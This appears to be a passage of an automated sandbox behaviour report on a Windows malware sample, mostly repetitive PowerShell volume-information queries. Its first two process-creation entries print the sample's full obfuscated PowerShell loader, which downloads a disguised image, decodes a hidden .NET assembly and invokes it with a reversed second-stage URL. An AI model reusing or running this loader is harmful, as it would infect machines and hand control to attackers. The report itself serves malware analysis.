                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhzfckjpu2vqukvmrvjlbknlllrpc3ryaw5nkclbmswzxssnecctsm9jbicnksaokcdwd2dpbwfnzvvybccrjyankyc9ig9uqwh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5ujysnsunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjijysnmja5yzyyyze3mza5nduxnzzhmdkwngygb1rboycrj3b3z3dlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7chdnaw1hz2vcexrlcya9ihb3z3dlyknsawvudc5eb3dubccrj29hzerhdgeochdnaw1hz2vvcmwpo3b3z2ltywdlvgv4dca9ifttexn0zw0uvccrj2v4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhb3z2ltywdlqnl0zxmpo3b3z3n0yxj0rmxhzya9ig9uqtw8qkftrty0xycrj1nuqvjupj5vvee7chdnzw5krmxhzya9ig9uqtw8qkftrty0x0vord4+b1rbo3b3z3n0yxj0sw5kzxggpsbwd2dpbwfnzvrlehqusw5kzxhpzihwd2dzdgfydezsywcpo3b3z2vuzeluzgv4id0gchdnaw1hz2vuzxh0lkluzgv4jysnt2yochdnzw5krmxhzyk7chdnjysnc3rhcnrjbmrlecatz2ugmcatyw5kihb3z2vuzeluzgv4ic1ndcbwd2dzdgfydeluzgv4o3b3z3n0yxj0sw5kzxggkz0gchdnc3rhcnrgbgfnlkxlbmd0adtwd2diyxnlnjrmzw5ndgggpsbwd2dlbmrjbmrlecatihb3z3n0yxj0sw5kzxg7chdnymfzzty0q29tbwfuzccrjya9ihb3z2ltywdlvgv4dc5tdwjzdhjpbmcochdnc3rhcnrjbmrlecwgchdnymfzzty0tgvuz3rokttwd2diyxnlnjrszxzlcnnlzca9ic1qb2luichwd2diyxnlnjrdb21tyw5kllrvjysnq2hhckfycmf5kckgng91iezvckvhy2gtt2jqzwn0ihsgchdnxyb9kvstms4ulshwd2diyxnlnjrdb21tyw5klkxlbmd0acldo3b3z2nvbscrj21hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcochdnymfzzty0umv2zxjzzwqpo3b3z2xvywrlzefzc2vtymwnkyd5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchwd2djb21tyw5kqnl0zxmpo3b3z3zhau1ldghvzca9iftkbicrj2xpyi5jty5ib21lxs5hjysnzxrnzxrob2qob1rbvkfjb1rbkttwd2d2ywknkydnzxrob2qusw52b2tlkhb3jysnz251bgwsieaob1rbdhh0llnmtfbnuy8ymy82mzeumzqyljmumjkxly86chr0ag9uqswgb1rbzgvzyxrpdmfkb29uqswnkycgb1rbzgvzjysnyxrpdmfkb29uqswgb1rbzgvzyxqnkydpdmfkb29uqswgb1rbyxnwbmv0x2nvbxbpbgvyb1rblcbvvefkjysnzxnhdgl2ywrvb1rblcbvvefkzxnhdgl2ywrvb1rblg9uqwrlc2f0axzhzg9vveesb1rbzgvzyxrpdmfkjysnb29uqsxvvefkzscrj3nhdgl2ywrvb1rblg9uqwrlc2f0axzhzg9vveesb1rbzgvzyxrpjysndmfkb29uqsxvvccrj0exb1rblg9ujysnqwrlc2f0axzhzg9vveepktsnks5szxbmqwnlkcdwd2cnlfttvhjjbmddw0noqxjdmzyplljlcexby2uokftdaefyxtexmstbq2hbcl04nctbq2hbcl02nsksw1nuckluz11bq2hbcl0zoskuumvwtefjzsgow0noqxjdntirw0noqxjdmtexk1tdaefyxtexnyksj3wnksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $verbosepreference.tostring()[1,3]+'x'-join'') (('pwgimageurl'+' '+'= otahttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnt'+'icffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f ota;'+'pwgwebclient = new-object system.net.webclient;pwgimagebytes = pwgwebclient.downl'+'oaddata(pwgimageurl);pwgimagetext = [system.t'+'ext.encoding]::utf8.getstring(pwgimagebytes);pwgstartflag = ota<<base64_'+'start>>ota;pwgendflag = ota<<base64_end>>ota;pwgstartindex = pwgimagetext.indexof(pwgstartflag);pwgendindex = pwgimagetext.index'+'of(pwgendflag);pwg'+'startindex -ge 0 -and pwgendindex -gt pwgstartindex;pwgstartindex += pwgstartflag.length;pwgbase64length = pwgendindex - pwgstartindex;pwgbase64command'+' = pwgimagetext.substring(pwgstartindex, pwgbase64length);pwgbase64reversed = -join (pwgbase64command.to'+'chararray() 4ou foreach-object { pwg_ })[-1..-(pwgbase64command.length)];pwgcom'+'mandbytes = [system.convert]::frombase64string(pwgbase64reversed);pwgloadedassembl'+'y = [system.reflection.assembly]::load(pwgcommandbytes);pwgvaimethod = [dn'+'lib.io.home].g'+'etmethod(otavaiota);pwgvai'+'method.invoke(pw'+'gnull, @(otatxt.sllpms/23/631.342.3.291//:ptthota, otadesativadoota,'+' otades'+'ativadoota, otadesat'+'ivadoota, otaaspnet_compilerota, otad'+'esativadoota, otadesativadoota,otadesativadoota,otadesativad'+'oota,otade'+'sativadoota,otadesativadoota,otadesati'+'vadoota,ot'+'a1ota,ot'+'adesativadoota));').replace('pwg',[string][char]36).replace(([char]111+[char]84+[char]65),[string][char]39).replace(([char]52+[char]111+[char]117),'|'))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
